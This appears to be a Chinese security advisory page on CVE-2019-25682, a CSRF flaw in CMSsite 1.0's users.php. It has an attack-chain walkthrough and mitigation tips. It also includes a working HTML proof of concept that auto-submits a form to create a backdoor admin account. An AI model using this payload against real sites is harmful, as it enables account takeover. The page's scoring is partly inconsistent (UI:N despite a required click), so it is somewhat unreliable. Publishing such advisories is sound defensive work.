CVE-2019-25682 CVSS 4.3 中危

CVE-2019-25682 CMSsite存在跨站请求伪造漏洞

披露日期: 2026-04-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2019-25682

漏洞类型

跨站请求伪造 (CSRF)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

CMSsite

漏洞概述

CMSsite 1.0 版本被发现存在严重的跨站请求伪造（CSRF）安全漏洞。由于该系统未对用户管理请求实施充分的状态验证，攻击者可利用此漏洞诱导已登录的管理员访问恶意构造的网页。一旦管理员访问，浏览器将自动向后台发送包含恶意参数的POST请求至users.php接口。这使得攻击者能够绕过权限检查，成功执行创建、修改或删除管理员账户等未授权操作，从而完全接管系统控制权。

技术细节

该漏洞的核心原因在于CMSsite 1.0的`users.php`接口缺乏有效的CSRF防御机制，如同步令牌模式。该接口处理用户管理逻辑，支持通过`source=add_user`、`source=edit_user`及`del=1`等参数进行账户增删改。攻击者首先侦察目标站点的表单结构，然后构建一个恶意的HTML页面，其中包含指向`users.php`的自动提交表单，表单内预设了攻击者所需的用户名、密码及权限参数。随后，攻击者通过社会工程学手段诱导管理员在已认证状态下访问此页面。由于浏览器默认携带当前域名的Cookie，服务器接收到请求后无法区分其来源合法性，进而将其视为正常的管理指令执行，导致攻击者成功植入后门账户或删除原有管理员。

攻击链分析

STEP 1

侦察阶段

攻击者确认目标使用的是CMSsite 1.0版本，并分析users.php的请求参数结构。

STEP 2

构造载荷

攻击者编写包含恶意HTML表单的代码，设置source=add_user等参数以创建管理员账户。

STEP 3

投递载荷

攻击者将恶意页面部署在互联网上，并通过邮件或即时通讯工具发送链接给目标管理员。

STEP 4

触发漏洞

管理员点击链接，浏览器在后台自动向服务器发送带有管理员Cookie的POST请求。

STEP 5

达成目标

服务器执行请求，成功添加攻击者预设的后门账户，攻击者随后可利用该账户登录后台。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- PoC for CSRF to add an admin user -->
<html>
  <body>
    <form action="http://target.com/users.php" method="POST">
      <input type="hidden" name="source" value="add_user" />
      <input type="hidden" name="username" value="attacker" />
      <input type="hidden" name="password" value="hacked123" />
      <input type="hidden" name="role" value="admin" />
      <input type="submit" value="Click me!" />
    </form>
    <script>
      // Auto-submit the form when the page loads
      document.forms[0].submit();
    </script>
  </body>
</html>

影响范围

CMSsite 1.0

防御指南

临时缓解措施

在官方发布补丁前，管理员应严格限制对后台管理页面的访问来源，避免在登录状态下浏览未知网站。同时，建议定期审计系统用户列表，及时发现并删除可疑账户。若可能，可部署WAF规则以拦截针对users.php的异常外部POST请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表